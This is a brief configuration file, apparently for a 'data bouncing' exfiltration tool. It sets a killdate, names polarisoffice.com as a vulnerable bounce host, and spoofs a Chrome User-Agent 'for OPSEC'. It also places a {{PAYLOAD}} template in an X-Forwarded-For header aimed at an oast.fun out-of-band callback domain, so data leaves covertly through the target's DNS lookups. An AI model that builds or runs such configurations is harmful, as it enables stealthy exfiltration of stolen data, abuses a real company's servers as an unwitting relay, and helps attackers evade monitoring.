# Killdate timestamp
killdate_timestamp = 1752514839

# Target host vulnerable to data bouncing
target_url = "https://polarisoffice.com"

# Headers to be used on the request
[headers]
# User Agent for OPSEC
User-Agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
# Example of a header for bouncing
"X-Forwarded-For" = "{{PAYLOAD}}.trusipslxdtucpeobgjovjwogvv7y4ecp.oast.fun"
